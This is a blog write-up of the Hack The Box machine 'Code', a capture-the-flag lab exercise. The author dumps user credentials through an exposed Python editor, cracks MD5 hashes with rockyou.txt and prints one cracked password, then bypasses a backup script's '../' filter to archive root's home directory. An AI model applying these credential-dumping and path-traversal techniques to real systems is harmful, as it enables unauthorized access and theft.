HTB-Code Writeup

Shreyas D RShreyas D R
3 min read

Enumeration:

We find a python code editor interestingly:

print(locals()) gave me the following output:

print(globals()) revealed a lot of details too ,but nothing interesting except a few functions.

I switched to burp and ran the run_code function where i noticed SQl Alchemy .(Ha ha some juicy stuff)

After running through some documentation I gave the following query :

users = User.query.all()
for user in users:
    print(user.username)
    print(user.password)

This gave me:

759b74ce43947f5f4c91aeddc3e5bad3
martin:3de6f30c4a09c27fc71932bfc68474be

Reversing these MD5 hashes we get :

There was nothing useful with user development!!! 😠. After spending a day I decide to move on to martin.

I used hashcat however it took forever.

I decided to use the rockyou.txt finally(My computer died plenty of times before it cracked the hash) and got password as nafeelswordsmaster.

now ssh to martin and we get a nice shell.

Now I started looking around to find something interesting where I came across a directory named /backups and an unusual file named /backy.sh.

Searching around in backy.sh:

martin@code:~$ cat /usr/bin/backy.sh #!/bin/bash
if [[ $# -ne 1 ]]; then /usr/bin/echo "Usage: $0 <task.json>" exit 1 fi

json_file="$1"

if [[ ! -f "$json_file" ]]; then /usr/bin/echo "Error: File '$json_file' not found." exit 1 fi

allowed_paths=("/var/" "/home/")

updated_json=$(/usr/bin/jq '.directories_to_archive |= map(gsub("\.\./"; ""))' "$json_file")

/usr/bin/echo "$updated_json" > "$json_file"

directories_to_archive=$(/usr/bin/echo "$updated_json" | /usr/bin/jq -r '.directories_to_archive[]')

is_allowed_path() { local path="$1" for allowed_path in "${allowed_paths[@]}"; do if [[ "$path" == $allowed_path* ]]; then return 0 fi done return 1 }

for dir in $directories_to_archive; do if ! is_allowed_path "$dir"; then /usr/bin/echo "Error: $dir is not allowed. Only directories under /var/ and /home/ are allowed." exit 1 fi done

/usr/bin/backy "$json_file"

I realised that I needed to find a .json file .

Now in backups there was task.json with the following contents :

I ran task.json with backy.sh and found the following:

I found a .bz2 file , I extracted it and found the deployment code for the website. Nothing here was interesting , since we were way past the stage , yet I searched around.

Now I knew that I had to somehow modify this file to get a file . ( This was the hardest part among others, I generated so many versions and had to take a break and start again after a day.)

Modify task.json’s “directories_to_archive” field from/../app-production to /../app.This will create a zip file that you can extract using tar-xf.(this took a while to figure out).

Extracting the .bz2 file will create a home directory in which you can get the user flag .

Now to obtain root I had to modify task.json plenty of times and I noticed that it removed “../” in directories_to_archives . My dumb ass took a while to figure out that I needed to modify exclude field too . Even after that, it took me a while to get it right

Correct task.json to get root .bz2 file:

Now there’s a new .bz2 file with root in file name .

Extracting it will get you a root folder in which root.txt lies:

We pwned it YAYYY!!!!

I had gotten the root flag before the user flag , the user flag was harder to get to be honest. I remodified tasks.json and respawned the machine plenty of times to makes sure I didn’t miss out on the user flag (got better screenshots haha 🥲)and somehow managed to get root before user..

That said, this was a simple box yet finding ways to go around it took quite a while , I rate this a 5/10.

Thank you for reading . See you again!!

0
Subscribe to my newsletter

Read articles from Shreyas D R directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Shreyas D R
Shreyas D R